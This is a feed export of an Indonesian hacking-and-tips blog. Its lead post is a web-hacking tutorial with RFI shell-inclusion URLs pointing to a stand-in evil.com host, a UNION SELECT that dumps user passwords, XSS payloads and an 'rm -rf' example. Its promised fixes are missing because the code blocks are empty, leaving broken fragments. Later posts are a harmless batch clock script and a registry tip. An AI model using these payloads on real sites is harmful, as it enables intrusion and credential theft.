<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8591117055296439835</id><updated>2011-04-21T12:23:44.076-07:00</updated><category term='Money maker'/><category term='Hacking'/><category term='Internet'/><category term='Blog'/><category term='Tips dan trik komputer'/><title type='text'>Aneuk Lhox's Blog</title><subtitle type='html'>"ThePiratesAceh Community"</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4942266076591509891</id><published>2008-03-31T20:30:00.000-07:00</published><updated>2008-03-31T20:32:29.182-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Web Hacking</title><content type='html'>&lt;p&gt;Things to know:&lt;br /&gt;&lt;br /&gt;=- Vulnerability : a security hole, can be exploited to  change the way the webapp / software works / functions.&lt;br /&gt;&lt;br /&gt;=- CMS's, Forums uses DataBases to store the info like users, posts, threads, messages and so on, its usually / mostly a MySQL server.&lt;br /&gt;&lt;br /&gt;=- RFI [ Remote File Inclusion ] : a  malicious user can include a 'bad' code to be executed on the vulnerable  site.&lt;br /&gt;&lt;br /&gt;=- LFI [ Local File Inclusion ] : a malicious user can open any  file on the server.&lt;br /&gt;&lt;br /&gt;=- SQL Injection : Injecting a MySQL query to bypass  or get more info from a DataBase.&lt;br /&gt;&lt;br /&gt;=- XSS [ Cross Site Scripting ] : if it was a permanent vulnerability, where the users input is saved, the user can log cookies, IP, and much more...&lt;br /&gt;&lt;br /&gt;=- Exploit : a script made to maliciously  use a vulnerability.&lt;br /&gt;&lt;br /&gt;We are going to take each vulnerability, and take alook at what goes wrong with the web developer, that made the script vulnerable...&lt;br /&gt;&lt;br /&gt;=- RFI  ::&lt;br /&gt;&lt;br /&gt;RFI's are exploited by including a 'bad' code from another site, to the infected site, for example you can include a PHP-Shell, and execute command on the server using it...&lt;br /&gt;&lt;br /&gt;this vulnerability is very dangerous, a site  infected with it can be compromised easily...&lt;br /&gt;&lt;br /&gt;an example of a code  infected with a RFI:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;as you can see, we are taking the variable page, and including it, now that script will work great and do what it's supposed to do, for example:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/index.dmz?page=contact.dmz" target="_blank"&gt;www.example.com/index.dmz?page=contact.dmz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;this would  open contact.dmz, BUT, what would a malicious user do?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/index.dmz?page=http://www.evil.com/shell.txt?" target="_blank"&gt;http://www.example.com/index.dmz?pag...com/shell.txt?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;the  shell code must be in a txt file, because this way the code will be parsed /  executed on the vulnerable site.&lt;br /&gt;&lt;br /&gt;what happens then?&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;that text file gets included, so lets say the shell.txt had the following  code:&lt;br /&gt;&lt;br /&gt;&lt;input name="'cmd'" type="'text'"&gt; &lt;input name="'submit'" value="'Go!'" type="'submit'"&gt; ";  ?&gt;&lt;br /&gt;&lt;br /&gt;a small text box would appear on the page, with a button, that would execute commands... the user can compromise the full site using this simple text box, if he had enough privs, he can do the following:&lt;br /&gt;&lt;br /&gt;rm -rf&lt;br /&gt;&lt;br /&gt;and delete  your files...&lt;br /&gt;&lt;br /&gt;some devs, think they can fix the vulnerability by doing  the following:&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;this way, you can only include .php files, and that is not really a big deal  cause PHP gets parsed on the server side...&lt;br /&gt;&lt;br /&gt;but, that wont stop some people, there is something called a NullByte, that would simply tell PHP to ignore anything after it... if someone wanted to exploit that code, he would do:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkmindz.com/index.dmz?page=http://www.evil.com/shell.txt?" target="_blank"&gt;http://www.darkmindz.com/index.dmz?p.../shell.txt?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;as  you can see, the [  ] is the NullByte, that would get parsed this way:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;so the question now, is how to completely secure this URL system?!&lt;br /&gt;&lt;br /&gt;well,  you can use a switch statement, and this way, anything other than what is  already stated, wont be included.. ex:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;that is a perfect system, simple, secure, and works &lt;img class="inlineimg" title="Smile" alt="" src="http://thepiratesaceh.blogspot.com/basic%20hacking.php_files/smile.gif" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;now that is done, RFI, is just like LFI, nothing is different, but the fact that LFI only gets the pages from the server, most of the times download scripts are infected with LFI, cause they are made to readfile(); whatever it was lol.. which is just bad coding...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now moving to  SQL injections, those are deadly when E-Commerce sites are infected with  them!!&lt;br /&gt;&lt;br /&gt;a malicious user would exploit an infected code, by bypassing a  login form, and logging in as admin.&lt;br /&gt;&lt;br /&gt;or by injecting the URL so he can  execute MySQL query's, which would let him gain access to Users info, and so on  ...&lt;br /&gt;&lt;br /&gt;example of vulnerable code:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now, as you can see, it takes the 'id' variable, and query's it, with no filters  at all!!!&lt;br /&gt;&lt;br /&gt;now if i wanted to inject it, i would first check for the  vulnerability.... by doing the following:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/page.php?id=1" target="_blank"&gt;www.example.com/page.php?id=1&lt;/a&gt; OR 2&lt;br /&gt;&lt;br /&gt;IF 2 news was there,  then am lucky &lt;img class="inlineimg" title="Big Grin" alt="" src="http://thepiratesaceh.blogspot.com/basic%20hacking.php_files/biggrin.gif" border="0" /&gt;, and here comes the good part, where the information gets extracted, using a UNION command, i can select from another column, and echo it there...&lt;br /&gt;&lt;br /&gt;so an injection would  be:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.example.com/page.php?id=1" target="_blank"&gt;www.example.com/page.php?id=1&lt;/a&gt; OR 2 UNION SELECT  name,1,password,email FROM users&lt;br /&gt;&lt;br /&gt;this would echo the passwords, to the page. now depending on the number of rows in the news column, i will need to change the number of rows selected...&lt;br /&gt;&lt;br /&gt;so now we know what went wrong,  lets secure it!!&lt;br /&gt;&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;that is it, this code is secure...&lt;br /&gt;&lt;br /&gt;now moving to XSS, it is not really a  big issue UNLESS it was permanent!&lt;br /&gt;&lt;br /&gt;example of permanent XSS would be in a  guestbook, comments, contact forms, mailing lists, etc...&lt;br /&gt;&lt;br /&gt;what can the  malicious user do?&lt;br /&gt;&lt;br /&gt;well, he can use a javascript to change title, forms,  prices, hidden data, pages, actions, and even worse, log the page!&lt;br /&gt;some CMS's and Forums, uses cookies and store the users info in them, if that site was vulnerable to XSS, the attacker can gain admin privs by logging the admin cookies...&lt;br /&gt;&lt;br /&gt;a vulnerable code would be:&lt;br /&gt;&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;br /&gt;";  echo $message; }  echo " &lt;form method="'post'" name="'message_box'"&gt; &lt;input name="'message'" type="'text'"&gt; &lt;input name="'submit'" type="'submit'"&gt; &lt;/form&gt;";  ?&gt;&lt;br /&gt;&lt;br /&gt;ok, so now a malicious user could do the following:&lt;br /&gt;&lt;br /&gt;submit the following  text to test for vulnerability :&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;script&gt;alert("xss")&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;h1&gt;Nice Website!&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;IF the HTML gets parsed "and it will in this code" , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..&lt;br /&gt;&lt;br /&gt;some methods of bypassing some filters, for example, if the form  only submits links, lets take this one as an example:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;";  echo "&lt;a href="http://thepiratesaceh.blogspot.com/%27$message%27"&gt;Link&lt;/a&gt;";; }  echo " &lt;form method="'post'" name="'message_box'"&gt; &lt;input name="'message'" type="'text'"&gt; &lt;input name="'submit'" type="'submit'"&gt; &lt;/form&gt;";  ?&gt;&lt;br /&gt;&lt;br /&gt;now that should not parse anything, but simply wrap it in a link  right?&lt;br /&gt;&lt;br /&gt;well, i don't think so, you can simply bypass it using:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;'&gt; &lt;script&gt;alert("owned")&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;why does that bypass it?!&lt;br /&gt;&lt;br /&gt;here is what happens, the   Code:&lt;br /&gt;'&gt;&lt;br /&gt;&lt;br /&gt;will stop the a tag, and then you can open anything else...&lt;br /&gt;&lt;br /&gt;here is the  result:&lt;br /&gt;&lt;br /&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;br /&gt;&lt;a href="http://thepiratesaceh.blogspot.com/%27%27"&gt; &lt;script&gt;alert("owned")&lt;/script&gt;'&gt;Link&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;as you can see, the a tag got closed, which allowed me to open another tag,  which is a script here. and it works&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Well, we are done now &lt;img class="inlineimg" title="Smile" alt="" src="http://thepiratesaceh.blogspot.com/basic%20hacking.php_files/smile.gif" border="0" /&gt;, i hope you enjoyed this  tutorial, and learned something new from it... questions?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-4942266076591509891?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4942266076591509891/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4942266076591509891' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4942266076591509891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4942266076591509891'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/web-hacking.html' title='Web Hacking'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-3823005997829286308</id><published>2008-03-29T11:55:00.000-07:00</published><updated>2008-03-31T20:19:25.953-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Tips-Trik CMD : Membuat JAMcmd</title><content type='html'>&lt;p&gt;Hola….., wah.. pasti banyak yang udah kangen (mungkin tidak samasekali) sama saya n gak sabar pengen liat tutorial keren lagi (huh..GR banget mas..). OK, langsung saja kita ke masalahnya, tapi sebelumnya saya pengen cerita dikit tentang munculnya ide gila ini.&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span&gt;&lt;/span&gt;Begini ceritanya…………………..waktu itu, di malam gelap gulita aku sedang memanjat pohon semangka yang sangaaat tinggi.. tiba-tiba aku dikagetkan oleh sesuatu yang sangat-sangat mengerikan. Sebuah sosok berambut hitam berkacamata datang menghampiriku dan waw..ternyata seorang wanita cantik. Saat itu aku terkesima ketika dia sedang mandi di sungai dan aku berniat untuk mencuri pakaiannya..tapi begitu saya hendak mengambilnya ada saja yang menggagalkan misi gila itu..emak aku menyiramku dengan segalon air dan akupun terbangun..yach buyar deh Ceritanya..tapi gpp masih ada cerita yang jauh lebih gak nyambung n’ ide yang lebih gila lagi, on next Tut’s tentunya..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span&gt;&lt;/span&gt;Langsung saja kita jangan berlama-lama lagi dengan cerita bodoh diatas, coz bikin kamu tambah bingung n tidak fokus..Kembali ke Judulnya: Membuat JAMcmd, pasti tambah bingung, apaan sich ??.. gw juga gak tau mau jelasin apa tentang jamCMD ini, kita liat aja yuk codenya biar ngerti….&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt; &lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span id="more-8"&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;HERE is THE CODE&lt;o:p&gt;&lt;/o:p&gt;&lt;/strong&gt;&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;strong&gt;(&lt;/strong&gt;tested on Windows XP sp 2&lt;strong&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/strong&gt;&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;———————- start ————————-&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;@echo off&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;start /b “%comspec%”&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;:update&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;set _time=%time:~0,8%&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;title Time : [ %_time% ] @ [ %date% ]&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;ping localhost -n 2 -w 500 &gt;nul&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;goto update&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;———————– end ————————–&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Lah, segitu aja, panjang ceritanya daripada codenya..dasar ide gila&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Save dengan extensi .bat&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Contoh : JamCMD.bat&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Copykan ke directory windows (c:\windows) supaya bisa dipanggil lewat menu RUN&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;START –&gt; RUN, truz tinggal ketik jamcmd…&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Oiya..kalau mau decompile jadi .exe juga bisa pake QuickBatchFileCompiler donlot di&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Link : &lt;a href="http://www.abyssmedia.com/quickbfc"&gt;http://www.abyssmedia.com/quickbfc&lt;/a&gt;&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Sekarang ke bab penjelasan..&lt;/p&gt;&lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Hmmm..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Tapi perasan gak ada yang bedanya dengan cmd biasa..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;..eits tunggu dulu, coba perhatikan lagi windowtitlenya bertuliskan “Time : [7:01:53] @ [ 30 Jul 07 ]”&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Nah itu dia bedanya, windowtitlenya ada jam dan tanggalnya yang selalu terupdate..&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;&lt;span&gt;&lt;/span&gt;b). Penjelasan Code&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;1.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;echo off – digunakan agar perintah tidak menampilkan pesan setelah dijalankan (berlaku untuk perintah setelah/dibawah echo off).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;2.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Start – untuk menjalankan suatu program (%comspec% adalah cmd, jadi kita menjalankan cmd).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;3.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;@ - sama dengan echo off tapi hanya untuk&lt;span&gt;  &lt;/span&gt;perintah dibelakangnya.&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;4.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;:update – memberi label update pada script untuk looping.&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;5.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Set – untuk menampilkan, mengeset, atau menghapus nilai dari suatu variable (pada kali ini kita menggunakan variable “_time”).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;6.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Title – untuk mengganti windowtitle CommandPrompt.&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;7.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;st1:place st="on"&gt;Ping&lt;/st1:place&gt; – sebenarnya untuk koneksi internet, tapi kita akali agar menggantikan pause selama 1 detik (di cmd tidak ada perintah untuk melakukan pause).&lt;/p&gt; &lt;p class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 36pt; text-align: justify; text-indent: -18pt; line-height: normal;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span&gt;&lt;span&gt;8.&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:'Times New Roman';font-size:7;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;Goto – untuk melakukan looping/perulangan/kembali ke label “update”&lt;/p&gt; &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify; line-height: normal;"&gt;Segitu aja yah penjelasannya, kalau ada yang belum jelas tanyaiin aja ke forum PemrogramanLain..oks&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-3823005997829286308?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/3823005997829286308/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=3823005997829286308' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3823005997829286308'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3823005997829286308'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tips-trik-cmd-membuat-jamcmd.html' title='Tips-Trik CMD : Membuat JAMcmd'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7524929008431601261</id><published>2008-03-29T11:51:00.002-07:00</published><updated>2008-03-29T11:54:03.968-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Tutorial Registry: memodifikasi content menu new</title><content type='html'>&lt;p align="left"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:78%;"  &gt;                                  (context menu = menu yang muncul pada saat kita                                  mengklik kanan)&lt;br /&gt;                               &lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style=";font-family:verdana,arial;font-size:85%;"  &gt;                                  &lt;/span&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Kalau                                  Anda mengklik kanan pada desktop dan memilih New,                                  maka akan terlihat banyak submenu untuk pembuatan                                  aneka dokumen. Misalnya MS Word, Text Document,                                  Corel Draw, dan lain-lain. Semakin banyak aplikasi                                  yang diinstall semakin banyak pula deretan submenu                                  tersebut.&lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Anda                                  bisa memodifikasi submenu document sesuai keinginan                                  Anda. Misalnya menghapus submenu (dari) document                                  yang jarang Anda buka/buat. Bisa juga menambahkan                                  bila belum terdapat pada submenu tersebut. Ada                                  pun cara untuk menghapus submenu tersebut adalah                                  sebagai berikut :&lt;/span&gt;&lt;/p&gt;                               &lt;ol&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Jalankan                                    registry editor.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Dari                                    menu Edit, klik Find.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Tuliskan                                    ShellNew, klik OK.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica;font-size:85%;"  &gt;Setelah                                    itu Anda bisa menghapus subkey ShellNew yang                                    ditemukan oleh registry editor tersebut.&lt;/span&gt;                                  &lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-7524929008431601261?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7524929008431601261/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7524929008431601261' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7524929008431601261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7524929008431601261'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tutorial-registry-memodifikasi-content.html' title='Tutorial Registry: memodifikasi content menu new'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-2766920410737891040</id><published>2008-03-29T11:51:00.000-07:00</published><updated>2008-03-29T11:52:55.345-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Tutorial Registry:</title><content type='html'>&lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica, sans-serif;font-size:78%;"&gt;                                  (context menu = menu yang muncul pada saat kita                                  mengklik kanan)&lt;br /&gt;                                &lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style="font-family:verdana, arial;font-size:85%;"&gt;                                  &lt;/span&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Kalau                                  Anda mengklik kanan pada desktop dan memilih New,                                  maka akan terlihat banyak submenu untuk pembuatan                                  aneka dokumen. Misalnya MS Word, Text Document,                                  Corel Draw, dan lain-lain. Semakin banyak aplikasi                                  yang diinstall semakin banyak pula deretan submenu                                  tersebut.&lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Anda                                  bisa memodifikasi submenu document sesuai keinginan                                  Anda. Misalnya menghapus submenu (dari) document                                  yang jarang Anda buka/buat. Bisa juga menambahkan                                  bila belum terdapat pada submenu tersebut. Ada                                  pun cara untuk menghapus submenu tersebut adalah                                  sebagai berikut :&lt;/span&gt;&lt;/p&gt;                               &lt;ol&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Jalankan                                    registry editor.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, 